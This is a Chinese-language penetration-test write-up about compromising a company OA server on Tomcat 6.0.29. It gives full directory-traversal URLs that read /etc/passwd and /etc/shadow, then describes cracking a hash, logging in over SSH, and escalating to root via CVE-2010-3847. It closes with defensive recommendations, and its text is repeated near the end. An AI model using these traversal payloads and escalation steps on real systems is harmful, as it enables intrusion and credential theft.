看我如何拿下公司OA服务器
字数 1132 2025-08-10 08:28:40

公司OA服务器渗透测试实战教学文档

0x00 信息收集阶段

目标识别

  • 目标地址:http://oa.xxx.com:8888/art/
  • 初始访问界面为OA系统登录页面

端口扫描

使用nmap进行全端口扫描:

nmap -v -A -p1-65535 -oN oa.xxx.com.txt oa.xxx.com

扫描结果:

  • 开放端口:53/tcp (DNS服务) 和 8888/tcp (Web服务)
  • 推测网络架构:扫描IP为公司出口防火墙,网站位于防火墙后方,8888端口被转发到内部服务器

Web服务器分析

通过Burp Suite抓包分析:

  • 无传统Web服务器(如Apache/Nginx)
  • 应用服务器为Tomcat
  • 后端开发语言为Java
  • 通过错误页面确认Tomcat版本:6.0.29

0x01 漏洞利用检测

已知漏洞检查

  • 检查CVE-2016-8735(Tomcat 6.0.29已知漏洞)
  • 结果:漏洞已修复,无法利用

0x02 漏洞挖掘与利用

功能点审查

发现三个可下载功能点,重点关注"FLASH插件下载"功能

目录遍历漏洞发现

  1. 正常下载链接: 
    http://oa.xxx.com:8888/art/download/downLoadPlugin.do?path=/usr/local/tomcat6.0.29/webapps/art/page/resource/utils/Adobe%20Flash%20Player%20for%20IE_10.exe&fileName=Adobe%20Flash%20Player%20for%20IE_10.exe
  2. 漏洞利用:
    • 修改path参数可读取任意文件
    • 成功读取/etc/passwd: 
      http://oa.xxx.com:8888/art/download/downLoadPlugin.do?path=/etc/passwd&fileName=passwd
    • 成功读取/etc/shadow: 
      http://oa.xxx.com:8888/art/download/downLoadPlugin.do?path=/etc/shadow&fileName=shadow
    • 确认Tomcat以root权限运行

进一步信息收集

  1. 读取Tomcat配置文件:

    /usr/local/tomcat6.0.29/webapps/conf/tomcat-users.xml
    • 尝试访问/manager/返回400错误,可能被删除

  2. 密码破解:

    • /etc/shadow中有密码的用户:root、dongda、oracle
    • 使用cmd5破解成功获取oracle用户密码

  3. 系统信息收集:

    • 读取/etc/redhat-release: 
      Red Hat Enterprise Linux Server release 5.4 (Tikanga)
    • 读取网络配置/etc/sysconfig/network-scripts/ifcfg-eth0获取内网IP

系统访问

使用获取的oracle凭证通过SSH登录目标主机:

ssh oracle@<内网IP>

0x03 权限提升

系统漏洞利用

  • 系统版本:Red Hat Enterprise Linux Server release 5.4 (Tikanga)
  • 可利用漏洞:CVE-2010-3847(本地提权漏洞)
  • 上传并执行提权脚本成功获取root权限

0x04 附录与参考资料

提权脚本使用

参考GitHub仓库:

https://github.com/ybdt/poc-hub/blob/master/2020_10_12_RedHat%205.4权限提升漏洞复现(CVE-2010-3847)/readme.md

替代提权方法

  • 评论中提到可使用"脏牛"漏洞(Dirty COW)提权

总结与防护建议

漏洞链总结

  1. 目录遍历漏洞(任意文件读取)
  2. 敏感信息泄露(shadow文件)
  3. 弱密码问题
  4. 系统版本过旧(未修复已知漏洞)

防护措施

  1. Web应用层面:

    • 修复目录遍历漏洞,限制文件下载路径
    • 禁用或保护敏感功能端点
    • 使用最小权限原则运行Tomcat

  2. 系统层面:

    • 及时更新操作系统和软件补丁
    • 使用强密码策略
    • 限制SSH访问(IP白名单、密钥认证)

  3. 网络层面:

    • 合理配置防火墙规则
    • 实施网络隔离(DMZ区)
公司OA服务器渗透测试实战教学文档 0x00 信息收集阶段 目标识别 目标地址:http://oa.xxx.com:8888/art/ 初始访问界面为OA系统登录页面 端口扫描 使用nmap进行全端口扫描: 扫描结果: 开放端口:53/tcp (DNS服务) 和 8888/tcp (Web服务) 推测网络架构:扫描IP为公司出口防火墙,网站位于防火墙后方,8888端口被转发到内部服务器 Web服务器分析 通过Burp Suite抓包分析: 无传统Web服务器(如Apache/Nginx) 应用服务器为Tomcat 后端开发语言为Java 通过错误页面确认Tomcat版本:6.0.29 0x01 漏洞利用检测 已知漏洞检查 检查CVE-2016-8735(Tomcat 6.0.29已知漏洞) 结果:漏洞已修复,无法利用 0x02 漏洞挖掘与利用 功能点审查 发现三个可下载功能点,重点关注"FLASH插件下载"功能 目录遍历漏洞发现 正常下载链接: 漏洞利用: 修改path参数可读取任意文件 成功读取/etc/passwd: 成功读取/etc/shadow: 确认Tomcat以root权限运行 进一步信息收集 读取Tomcat配置文件: 尝试访问/manager/返回400错误,可能被删除 密码破解: /etc/shadow中有密码的用户:root、dongda、oracle 使用cmd5破解成功获取oracle用户密码 系统信息收集: 读取/etc/redhat-release: 读取网络配置/etc/sysconfig/network-scripts/ifcfg-eth0获取内网IP 系统访问 使用获取的oracle凭证通过SSH登录目标主机: 0x03 权限提升 系统漏洞利用 系统版本:Red Hat Enterprise Linux Server release 5.4 (Tikanga) 可利用漏洞:CVE-2010-3847(本地提权漏洞) 上传并执行提权脚本成功获取root权限 0x04 附录与参考资料 提权脚本使用 参考GitHub仓库: 替代提权方法 评论中提到可使用"脏牛"漏洞(Dirty COW)提权 总结与防护建议 漏洞链总结 目录遍历漏洞(任意文件读取) 敏感信息泄露(shadow文件) 弱密码问题 系统版本过旧(未修复已知漏洞) 防护措施 Web应用层面: 修复目录遍历漏洞,限制文件下载路径 禁用或保护敏感功能端点 使用最小权限原则运行Tomcat 系统层面: 及时更新操作系统和软件补丁 使用强密码策略 限制SSH访问(IP白名单、密钥认证) 网络层面: 合理配置防火墙规则 实施网络隔离(DMZ区)